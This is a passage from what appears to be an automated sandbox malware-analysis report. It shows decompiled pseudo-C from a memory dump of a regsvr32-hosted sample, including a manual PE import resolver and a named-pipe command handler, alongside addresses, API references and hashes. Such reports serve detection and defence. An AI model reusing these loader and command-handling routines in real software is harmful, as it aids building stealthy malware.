						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}

0x02bd3dd0
0x02bd3ddd
0x02bd3de3
0x02bd3dec
0x02bd3def
0x02bd3df2
0x00000000
0x02bd3ee3
0x02bd3ee7
0x02bd3ee9
0x02bd3ef7
0x02bd4015
0x02bd4019
0x02bd40de
0x02bd40e7
0x02bd40ea
0x02bd40ee
0x02bd40f4
0x02bd40fc
0x02bd40fc
0x02bd4104
0x02bd4112
0x02bd4115
0x02bd4119
0x02bd411f
0x02bd412f
0x02bd415a
0x00000000
0x02bd415c
0x02bd4135
0x02bd4146
0x00000000
0x02bd4154
0x02bd4158
0x00000000
0x02bd4154
0x02bd4148
0x02bd414c
0x02bd4151
0x00000000
0x02bd4151
0x02bd4137
0x02bd413b
0x02bd413d
0x00000000
0x02bd413d
0x02bd4121
0x02bd4125
0x00000000
0x02bd4127
0x02bd401f
0x02bd4023
0x02bd4025
0x02bd4033
0x00000000
0x00000000
0x02bd4039
0x02bd4042
0x02bd4050
0x02bd405c
0x02bd4068
0x02bd4071
0x02bd4074
0x02bd4078
0x02bd407a
0x02bd4087
0x02bd409b
0x02bd40aa
0x02bd40bb
0x02bd4084
0x00000000
0x02bd4084
0x02bd40bd
0x02bd40c1
0x02bd40c6
0x00000000
0x02bd40c6
0x02bd40d1
0x00000000
0x00000000
0x02bd40d3
0x02bd40d7
0x00000000
0x02bd40d9
0x02bd3efd
0x02bd3f06
0x02bd3f14
0x02bd3f17
0x02bd3f34
0x02bd3f3b
0x02bd3f4d
0x02bd3f4d
0x02bd3f54
0x02bd3f64
0x02bd3f7c
0x02bd3f66
0x02bd3f6e
0x02bd3f6e
0x02bd3f7f
0x02bd3f83
0x02bd3f93
0x02bd3fb6
0x02bd3fc8
0x02bd3f95
0x02bd3fa9
0x02bd3fa9
0x02bd3fd2
0x02bd3fee
0x02bd3fd4
0x02bd3fe3
0x02bd3fe3
0x02bd3ff6
0x02bd3fff
0x02bd3fff
0x02bd400d
0x00000000
0x02bd3f56
0x02bd3f58
0x00000000
0x02bd3f58
0x02bd3f54
0x00000000
0x02bd3f17
0x02bd3dfa
0x02bd3e08
0x02bd3e0d
0x02bd3e18
0x02bd3e1b
0x02bd3e1f
0x02bd3e21
0x02bd3e31
0x02bd3e3a
0x02bd3e43
0x02bd3e4b
0x02bd3e54
0x02bd3e5f
0x02bd3e65
0x02bd3e68
0x02bd3e6b
0x02bd3e72
0x02bd3e79
0x00000000
0x00000000
0x02bd3e84
0x02bd3e92
0x02bd3e9d
0x02bd3ea7
0x02bd3ebf
0x02bd3ecc
0x02bd3ecc
0x02bd3ea9
0x02bd3eb4
0x02bd3eb4
0x02bd3ed3
0x02bd3ed3
0x02bd3edb
0x02bd3edb
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 02BD3F2E
LoadLibraryA.KERNEL32(00000000), ref: 02BD3F47
GetProcAddress.KERNEL32(00000000,?), ref: 02BD3FA3
GetProcAddress.KERNEL32(00000000,?), ref: 02BD3FC2
lstrcmpA.KERNEL32(?,00000000), ref: 02BD40B3

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModulelstrcmp
String ID:
API String ID: 1872726118-0
Opcode ID: ccb0071af6d8d827d2ef755551d20fd46df36cd9994ec976cdc9ce168f449e49
Instruction ID: 09c2b8ca079a118eabf1372a9be29d4ebddf94e5c22139f7667b606592b5f534
Opcode Fuzzy Hash: ccb0071af6d8d827d2ef755551d20fd46df36cd9994ec976cdc9ce168f449e49
Instruction Fuzzy Hash: 92E17D75A00209DFCB14CFA8C884AEDBBF1FB08358F1485A9E815EB391E734A995CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1A0A Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X, xrefs: 02BD1B24
@, xrefs: 02BD1A78
\u%04X\u%04X, xrefs: 02BD1B63

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 78be254d3003d923889dfb5acc518a3d43c7f42ce3af900c419a2b755801c2af
Instruction ID: 27f85fc8bfa24ab6fe93f8280fae4cbec09f26d3851b1ec064c7ecd235340eca
Opcode Fuzzy Hash: 78be254d3003d923889dfb5acc518a3d43c7f42ce3af900c419a2b755801c2af
Instruction Fuzzy Hash: C5410671B2060AA7DB289DAC8D99BFE3659DF44618F1401D6FD2ED6240F360C990C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 02BD33DA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02BD33DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L02BD3533();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E02BD33B3(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E02BC8ECB(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x2bd1bc5
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}

0x02bd33da
0x02bd33dd
0x02bd33e2
0x02bd33e6
0x02bd33e6
0x02bd33ec
0x02bd33f0
0x02bd33f1
0x02bd33f4
0x02bd33f5
0x02bd33fa
0x02bd33fd
0x02bd33fe
0x02bd3403
0x02bd340a
0x02bd3493
0x02bd3493
0x00000000
0x02bd3415
0x02bd3416
0x02bd3428
0x02bd344e
0x02bd344e
0x02bd3457
0x02bd3459
0x02bd345f
0x02bd348e
0x02bd348e
0x02bd3496
0x02bd3499
0x02bd3499
0x02bd3461
0x02bd3462
0x02bd3468
0x02bd346a
0x02bd346a
0x02bd346f
0x02bd346e
0x02bd346e
0x02bd3476
0x02bd3482
0x02bd348c
0x02bd348c
0x00000000
0x02bd3438
0x02bd3438
0x02bd3438
0x02bd343e
0x00000000
0x00000000
0x02bd3440
0x02bd3446
0x02bd344b
0x00000000
0x02bd344b
0x02bd3428

APIs

_snprintf.MSVCRT ref: 02BD33FE
strchr.MSVCRT ref: 02BD341E
strchr.MSVCRT ref: 02BD342D
strchr.MSVCRT ref: 02BD3452

Strings

%.*g, xrefs: 02BD33F5

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: strchr$_snprintf
String ID: %.*g
API String ID: 3619936089-952554281
Opcode ID: 1a80728f008cdd92ec9efa55ec7dc647470406189807a21b859a01e8112d53c2
Instruction ID: d3ac8b307deb222d2ef03e92a0dcd1f3b50e15018c19a61937fd91404765e0d3
Opcode Fuzzy Hash: 1a80728f008cdd92ec9efa55ec7dc647470406189807a21b859a01e8112d53c2
Instruction Fuzzy Hash: 5F21572260461527EB265E28EC95BEB37D9DF01724F1C41E9F84486183F7A8A9804FD3

Uniqueness

Uniqueness Score: -1.00%

Function 02BC3775 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310
pipeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E02BC3775(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				signed int _t145;
				signed int _t147;
				signed short* _t148;
				signed int _t158;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				signed short* _t191;
				void* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t207;
				void* _t209;
				void* _t215;
				void* _t222;

				_t222 = __fp0;
				_t209 = (_t207 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x2bdf8d0; // 0x483f8c0
					_push(0);
					_push( *0x2bdf8b4);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x2bdf8d0; // 0x483f8c0
					_push(0x80000);
					_push( *0x2bdf974);
					_push( *0x2bdf8b4);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t148 =  *0x2bdf974; // 0x0
						_t80 =  *_t148 & 0x0000ffff;
						_t215 = _t80 - 8;
						if(_t215 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E02BD09C3( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t186);
								E02BCD297(_t186);
								L32:
								L56:
								DisconnectNamedPipe( *0x2bdf8b4);
								_push(0);
								_pop(0);
								_push(1);
								_pop(1);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E02BC16B0( &_v204, _t222);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t145 = _v204;
								_t90 = _t145 * 0x16;
								_v184 = _t145 * 0x16;
								_t203 = E02BC8DC9(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t187 = 0xa;
									E02BCD297(_t187);
									L52:
									E02BC8DDF( &_v188, _t145);
									goto L32;
								}
								_t198 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L50:
									_push(E02BCA5D0(_t203));
									_push(_t203);
									_t188 = 5;
									E02BCD297(_t188);
									E02BC8DDF( &_v192, 0xffffffff);
									_t209 = _t209 + 0x10;
									goto L52;
								}
								_t158 = _v188 + 4;
								__eflags = _t158;
								_v204 = _t158;
								do {
									__eflags = _t198;
									if(_t198 != 0) {
										__eflags = _t198 - _t145 - 1;
										if(_t198 < _t145 - 1) {
											_t102 = E02BCA5D0(_t203);
											_t158 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t158;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E02BCA5D0(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E02BCA5D0(_t203) + _t203;
										__eflags = _t110;
										E02BC9FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t158 = _v204;
										_t209 = _t209 + 0x20;
									}
									_t198 = _t198 + 1;
									_t158 = _t158 + 0x20;
									_v204 = _t158;
									__eflags = _t198 - _t145;
								} while (_t198 < _t145);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E02BC16B0( &_v204, _t222);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E02BC8DDF( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t215 == 0) {
							_t84 = E02BD09C3( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t199 = E02BC9D29( &(_t148[4]), 0x20, 1,  &_v176);
							_v196 = _t199;
							__eflags = _t199;
							if(_t199 == 0) {
								L30:
								_t191 =  *0x2bdf974; // 0x0
								E02BCA06E( &_v164,  &(_t191[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E02BC1D97(E02BCA102( *_t199, __eflags), 0, 0, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E02BC8DC9(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t147 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E02BC1D97(E02BCA102( *_t199, __eflags), _t127, _v184, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t129;
								E02BC9E22( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E02BC9A76( *((intOrPtr*)(_t199 + _t147 * 4)), E02BCA5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
								_t182 = _v204;
								_t147 = _t147 + 1;
								 *_t182 = _t132;
								_v204 = _t182 + 4;
								__eflags = _t147 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t195 = 5;
							E02BCD297(_t195);
							 *0x2bdf9a8 = 1;
							_v172 = 1;
							goto L56;
						}
						_t136 = _t133;
						if(_t136 == 0) {
							_t84 = E02BD09A1( &_v200);
							goto L16;
						}
						if(_t136 != 1) {
							goto L56;
						}
						E02BD09A1( &_v200);
						goto L12;
					}
				}
				return 0;
			}

0x02bc3775
0x02bc377b
0x02bc3788
0x02bc378d
0x02bc3791
0x02bc3791
0x02bc3796
0x02bc3797
0x02bc379d
0x02bc37a9
0x00000000
0x00000000
0x02bc37bc
0x02bc37c1
0x02bc37c2
0x02bc37c7
0x02bc37cc
0x02bc37d2
0x02bc37e0
0x02bc3aec
0x00000000
0x02bc37f1
0x02bc37f1
0x02bc37f7
0x02bc37fa
0x02bc37fd
0x02bc396b
0x02bc396b
0x02bc396e
0x02bc3ae2
0x02bc382c
0x02bc382d
0x02bc3831
0x02bc3831
0x02bc3833
0x02bc3833
0x02bc3834
0x02bc394f
0x02bc394f
0x02bc3950
0x02bc3955
0x02bc3af2
0x02bc3af8
0x02bc3b03
0x02bc3b05
0x02bc3b06
0x02bc3b08
0x02bc3b09
0x00000000
0x00000000
0x00000000
0x02bc3b09
0x02bc3975
0x02bc3975
0x02bc3978
0x02bc39bd
0x02bc39c1
0x02bc39c6
0x02bc39ca
0x02bc39cc
0x02bc3acd
0x02bc3ad3
0x02bc3ad7
0x02bc3852
0x02bc3852
0x00000000
0x02bc3852
0x02bc39d2
0x02bc39d6
0x02bc39da
0x02bc39e3
0x02bc39e5
0x02bc39ea
0x02bc39ec
0x02bc3aa7
0x02bc3aa7
0x02bc3aa7
0x02bc3ab0
0x02bc3ab2
0x02bc3ab5
0x02bc3ab6
0x02bc3abd
0x02bc3ac3
0x00000000
0x02bc3ac3
0x02bc39f2
0x02bc39f4
0x02bc39f6
0x02bc3a85
0x02bc3a8c
0x02bc3a8d
0x02bc3a90
0x02bc3a91
0x02bc3a9d
0x02bc3aa2
0x00000000
0x02bc3aa2
0x02bc3a00
0x02bc3a00
0x02bc3a03
0x02bc3a07
0x02bc3a07
0x02bc3a09
0x02bc3a0e
0x02bc3a10
0x02bc3a13
0x02bc3a19
0x02bc3a1d
0x02bc3a1d
0x02bc3a10
0x02bc3a23
0x02bc3a25
0x02bc3a29
0x02bc3a2b
0x02bc3a2e
0x02bc3a35
0x02bc3a3e
0x02bc3a44
0x02bc3a49
0x02bc3a52
0x02bc3a6a
0x02bc3a6a
0x02bc3a6d
0x02bc3a72
0x02bc3a76
0x02bc3a76
0x02bc3a79
0x02bc3a7a
0x02bc3a7d
0x02bc3a81
0x02bc3a81
0x00000000
0x02bc3a07
0x02bc397a
0x02bc397d
0x00000000
0x00000000
0x02bc3987
0x02bc398b
0x02bc3990
0x02bc3994
0x02bc3998
0x02bc399a
0x02bc39a2
0x02bc39a8
0x02bc39ac
0x02bc39b0
0x00000000
0x02bc39b0
0x02bc3803
0x02bc3961
0x02bc3845
0x02bc3846
0x02bc3848
0x02bc3850
0x02bc3851
0x00000000
0x02bc3851
0x02bc384a
0x00000000
0x02bc384a
0x02bc3809
0x02bc380c
0x02bc3884
0x02bc3886
0x02bc388c
0x02bc388e
0x02bc392b
0x02bc392b
0x02bc393d
0x02bc3943
0x02bc394c
0x02bc394d
0x00000000
0x02bc394d
0x02bc3894
0x02bc3898
0x02bc389b
0x02bc391f
0x02bc3924
0x02bc3927
0x00000000
0x02bc3927
0x02bc389d
0x02bc38a0
0x02bc38a8
0x02bc38ad
0x02bc38b2
0x02bc38b4
0x00000000
0x00000000
0x02bc38b8
0x02bc38b9
0x02bc38bb
0x02bc38ea
0x02bc38f9
0x02bc38fe
0x02bc3901
0x02bc390d
0x00000000
0x02bc390d
0x02bc38bd
0x02bc38c1
0x02bc38cf
0x02bc38d4
0x02bc38d8
0x02bc38d9
0x02bc38de
0x02bc38e2
0x02bc38e2
0x02bc38e6
0x00000000
0x02bc38e6
0x02bc380e
0x02bc3811
0x02bc3859
0x02bc385a
0x02bc385d
0x02bc385e
0x02bc3865
0x02bc386b
0x00000000
0x02bc386b
0x02bc3814
0x02bc3817
0x02bc3840
0x00000000
0x02bc3840
0x02bc381c
0x00000000
0x00000000
0x02bc3827
0x00000000
0x02bc3827
0x02bc37e0
0x02bc3b17

APIs

GetLastError.KERNEL32 ref: 02BC37AB

Part of subcall function 02BCD297: FlushFileBuffers.KERNEL32(00000000,?,02BC3ABB,00000000,00000004), ref: 02BCD2DD

DisconnectNamedPipe.KERNEL32 ref: 02BC3AF8

Strings

%u.%u.%u.%u:%u, xrefs: 02BC3A5B

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
String ID: %u.%u.%u.%u:%u
API String ID: 465096328-3858738763
Opcode ID: 6a5d31e6bd68ace6e5f2623fc3a29385ca51d2286de1d1be0c81e2c4bd4daa2e
Instruction ID: 8c1d8b8f8e09cd00004f645dd1ef7858d27044c373920e4d756e88f8f36ccc41
Opcode Fuzzy Hash: 6a5d31e6bd68ace6e5f2623fc3a29385ca51d2286de1d1be0c81e2c4bd4daa2e
Instruction Fuzzy Hash: BFA1B072508301AFD304EF68D884A7BB7E9EB84314F6489AEF596D7180EB35D905CF52

Uniqueness

Uniqueness Score: -1.00%

Function 02BD376C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02BD376C(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E02BCF024(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x02bd376c
0x02bd3772
0x02bd377a
0x02bd378f
0x02bd37a1
0x02bd37ad
0x02bd37b3
0x02bd37b8
0x02bd37c4
0x02bd392f
0x00000000
0x02bd392f
0x02bd37ca
0x02bd37d3
0x02bd37e1
0x02bd37e4
0x02bd37f3
0x02bd37f3
0x02bd37fa
0x02bd3808
0x02bd380b
0x02bd3828
0x02bd382f
0x02bd383f
0x02bd3857
0x02bd3841
0x02bd3849
0x02bd3849
0x02bd385a
0x02bd385e
0x02bd386a
0x02bd386e
0x02bd3872
0x02bd3876
0x02bd3882
0x02bd38ad
0x02bd38b5
0x02bd38c7
0x02bd38d3
0x02bd3884
0x02bd3889
0x02bd3894
0x02bd38a0
0x02bd38a0
0x02bd38dc
0x02bd38e2
0x02bd38ec
0x02bd3908
0x02bd38ee
0x02bd38fd
0x02bd38fd
0x02bd38ec
0x02bd3910
0x02bd3919
0x02bd3919
0x02bd3927
0x00000000
0x02bd3927
0x02bd3833
0x00000000
0x02bd3833
0x00000000
0x02bd380b
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD3789
LoadLibraryA.KERNEL32(00000000), ref: 02BD3822

Strings

GetProcAddress, xrefs: 02BD3792
kernel32.dll, xrefs: 02BD3784

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: d59caebed6fe02334e7edc535c65f5d1bd0d7f8e265258123d6bd1e301bfe122
Instruction ID: a63e5045ee1cf129e4a016761d91cd0aea0fed061f0082f0683f4da2de0ea477
Opcode Fuzzy Hash: d59caebed6fe02334e7edc535c65f5d1bd0d7f8e265258123d6bd1e301bfe122
Instruction Fuzzy Hash: A3616C75900209EFDB00CF98C885BEDBBF1FF08315F2485A9E955AB291D374AA80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4160 Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E02BD4160(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x5d08408b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x51ec8b55
					_t12 = _t272 + 0x5c; // 0xee85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E02BD7180(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E02BD5EE0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xee85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
